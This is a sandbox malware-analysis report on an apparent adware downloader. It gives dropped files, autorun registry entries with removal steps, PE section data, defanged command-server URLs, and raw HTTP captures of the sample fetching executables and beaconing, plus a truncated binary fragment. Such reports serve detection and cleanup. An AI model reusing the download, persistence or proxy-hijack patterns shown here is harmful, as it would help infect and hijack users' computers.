%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns97.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns56.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns26.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns24.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA1.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns23.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns75.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns87.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns64.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns99.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns72.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns57.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns25.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns76.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns47.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns51.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns94.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAF.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns92.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAA.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns61.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns48.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns29.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA2.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns59.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns78.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA6.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns53.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAE.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns16.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns93.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns83.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns74.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2B.tmp (6 bytes)
C:\a\avchk.txt (2026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns54.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAC.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA5.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns50.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns63.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns79.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns73.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns21.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns46.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns37.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns89.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns30.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns90.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns95.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns67.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns36.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns60.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns58.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns33.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns68.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns98.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns39.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns28.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns82.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns52.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns69.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns80.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns49.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns55.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns17.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns20.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns41.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns15.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns66.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns44.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAB.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns10.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA9.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns12.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns65.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\vchk[1].htm (2026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns40.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns32.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns34.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns42.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns45.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns31.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns85.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns13.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns91.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns38.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns96.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns88.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns71.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns43.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns70.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns35.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA0.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAD.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\desktop.ini (67 bytes)
C:\a\loogg2.txt (240 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\desktop.ini (67 bytes)
C:\a\logff.txt (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\ckkkp[1].htm (324 bytes)
C:\a\1logff.txt (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aDYK287G2Jhwy64P0Ln0s.html (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\inetc.dll (20 bytes)
C:\a\1loogg2.txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DYK287G2Jhwy64P0Ln0s.html (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\ns27.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\ckkk[1].htm (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\localhost[1].htm (716 bytes)
C:\a\vv11111.txt (22835 bytes)
C:\a\FiddlerCore.dll (9485 bytes)
C:\a\zuur.txt (2 bytes)
C:\a\internetport3.exe (10 bytes)
C:\a\wcheckf.exe (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\System.dll (11 bytes)
C:\a\zhho.txt (3 bytes)
C:\a\zvchk.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\uniqueDYK287G2Jhwy64P0Ln0s[1].htm (10 bytes)
%Program Files%\FastInternet\app.exe (1078 bytes)
C:\a\29935426.bat (287 bytes)
C:\a\winonit.exe (435 bytes)
C:\a\DYK287G2Jhwy64P0Ln0s.exe (3808 bytes)
C:\a\ayyyyy.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\AccessControl.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\inetc.dll (20 bytes)
C:\a\ukey.ini (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\bdcount[1].htm (8 bytes)
C:\a\zvv.txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\DYK287G2Jhwy64P0Ln0s[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\UAC.dll (13 bytes)
C:\a\ver.ini (8 bytes)
C:\a\getcap.exe (10027 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\pwgen.dll (17 bytes)
C:\a\uniqueDYK287G2Jhwy64P0Ln0s.ini (10 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\cki[1].htm (11 bytes)
%System%\63839615.bat (19 bytes)
C:\a\install.txt (1 bytes)
%Program Files%\FastInternet\dotuninstall.exe (1084 bytes)
C:\a\wincheckfe.exe (778 bytes)
C:\a\lOD0hGDlkq.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\SimpleFC.dll (5289 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"interpee" = "C:\a\internetport3.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dutoauto" = "C:\a\wincheckfe.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cutoauto" = "C:\a\wincheckfe.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"interpee" = "C:\a\internetport3.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"autoauto" = "63839615.bat"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"rutoauto" = "63839615.bat" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 65536 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 258048 | 2528 | 2560 | 3.12403 | 3333d5ca3c163ed95562eb98d8231779 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 10
Network Activity
URLs
URL | IP |
---|---|
hxxp://dotdo.net/cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877; | 81.17.31.2 |
hxxp://dotdo.net/act/bdcount.ini?uniqueid=DYK287G2Jhwy64P0Ln0s&type=1&reg=63839615.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=4 | 81.17.31.2 |
hxxp://dotdo.net/act/uniqueDYK287G2Jhwy64P0Ln0s.ini?rd=4 | 81.17.31.2 |
hxxp://dotdo.net/act/exesbununique/DYK287G2Jhwy64P0Ln0s.exe | 81.17.31.2 |
hxxp://dotdo.net/act/exevc/vchk.exe | 81.17.31.2 |
hxxp://dotdo.net/act/txt/hho.txt | 81.17.31.2 |
hxxp://dotdo.net/act/txt/uur.txt | 81.17.31.2 |
hxxp://dotdo.net/act/txt/vv.txt | 81.17.31.2 |
hxxp://dotdo.net/act/txt/vchk.txt | 81.17.31.2 |
hxxp://dotdo.net/ckkkp.html | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/txt/uur.txt | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/uniqueDYK287G2Jhwy64P0Ln0s.ini?rd=4 | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/exevc/vchk.exe | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/txt/vchk.txt | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/bdcount.ini?uniqueid=DYK287G2Jhwy64P0Ln0s&type=1&reg=63839615.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=4 | 81.17.31.2 |
hxxp://dotdo.net/ckkk.html | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/txt/hho.txt | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/exesbununique/DYK287G2Jhwy64P0Ln0s.exe | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/txt/vv.txt | 81.17.31.2 |
fp0.dotdo.net | 109.123.123.124 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /act/exevc/vchk.exe HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:12 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Wed, 19 Aug 2015 17:31:58 GMT
ETag: "16a000000026349-ddb0-51dad696a4296"
Accept-Ranges: bytes
Content-Length: 56752
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
<<< skipped >>>
GET /cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877; HTTP/1.1
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:04 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 11
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
...googgoodHTTP/1.1 200 OK..Date: Sat, 29 Aug 2015 11:59:04 GMT..Server: Apache/2.2.22 (Win64) PHP/5.3.13..X-Powered-By: PHP/5.3.13..Content-Length: 11..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type: text/html.....googgood..
GET /act/txt/vchk.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:13 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
2990..mpck_gb_26.exe.upmpck_gb_26.exe.LuckyTab.exe.MaxComputerCleaner_Maintenance.exe.ospd_us_1080.exe.upmbot_gb_571.exe.Setup_product_26943.exe.SwiftRecord.expext.exe.SwiftRecord.BOASHelper.exe.SwiftRecord.BOASPRT.exe.SwiftRecord.BOAS.exe.SwiftRecord.BrowserAdapter.exe.TriplePose.expext.exe.TriplePose.BOASHelper.exe.TriplePose.BOASPRT.exe.TriplePose.BOAS.exe.TriplePose.BrowserAdapter.exe.FragileFixer.expext.exe.FragileFixer.BOASHelper.exe.FragileFixer.BOASPRT.exe.FragileFixer.BOAS.exe.FragileFixer.BrowserAdapter.exe.SimpleforYou.expext.exe.SimpleforYou.BOASHelper.exe.SimpleforYou.BOASPRT.exe.SimpleforYou.BOAS.exe.SimpleforYou.BrowserAdapter.exe.Hatchiho.expext.exe.Hatchiho.BOASHelper.exe.Hatchiho.BOASPRT.exe.Hatchiho.BOAS.exe.Hatchiho.BrowserAdapter.exe.MountainBike.expext.exe.MountainBike.BOASHelper.exe.MountainBike.BOASPRT.exe.MountainBike.BOAS.exe.MountainBike.BrowserAdapter.exe.EduApp.expext.exe.EduApp.BOASHelper.exe.EduApp.BOASPRT.exe.EduApp.BOAS.exe.EduApp.BrowserAdapter.exe.innoApp.expext.exe.innoApp.BOASHelper.exe.innoApp.BOASPRT.exe.innoApp.BOAS.exe.innoApp.BrowserAdapter.exe.SpecialBox.expext.exe.SpecialBox.BOASHelper.exe.SpecialBox.BOASPRT.exe.SpecialBox.BOAS.exe.SpecialBox.BrowserAdapter.exe.BetweenLines.expext.exe.BetweenLines.BOASHelper.exe.BetweenLines.BOASPRT.exe.BetweenLines.BOAS.exe.BetweenLines.BrowserAdapter.exe.EnhanceTronic.expext.exe.EnhanceTronic.BOASHelper.exe.EnhanceTronic.BOASPRT.exe.EnhanceTronic.BOAS.exe.EnhanceTronic.BrowserAdapter.exe.MetalMaker.expext.exe.MetalMaker.BOASHelper.e
<<< skipped >>>
GET /ckkkp.html HTTP/1.0
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Pragma: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:40 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Sat, 29 Nov 2014 11:40:35 GMT
ETag: "100000000026c77-9f-508fdd8811aa8"
Accept-Ranges: bytes
Content-Length: 159
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<title>Untitled</title>..</head>..<body>....<mamoba>..</body>..</html>..HTTP/1.1 200 OK..Date: Sat, 29 Aug 2015 11:59:40 GMT..Server: Apache/2.2.22 (Win64) PHP/5.3.13..Last-Modified: Sat, 29 Nov 2014 11:40:35 GMT..ETag: "100000000026c77-9f-508fdd8811aa8"..Accept-Ranges: bytes..Content-Length: 159..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type: text/html..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<title>Untitled</title>..</head>..<body>....<mamoba>..</body>..</html>....
GET /act/bdcount.ini?uniqueid=DYK287G2Jhwy64P0Ln0s&type=1&reg=63839615.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:07 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
[a]..v=6....
GET /act/uniqueDYK287G2Jhwy64P0Ln0s.ini?rd=4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:07 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 10
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
[a]..v=yes....
GET /act/exesbununique/DYK287G2Jhwy64P0Ln0s.exe HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:07 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Tue, 26 May 2015 16:50:52 GMT
ETag: "100000000026a66-dfa3-516feede835a3;509b7b7bbf620"
Accept-Ranges: bytes
Content-Length: 57251
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... 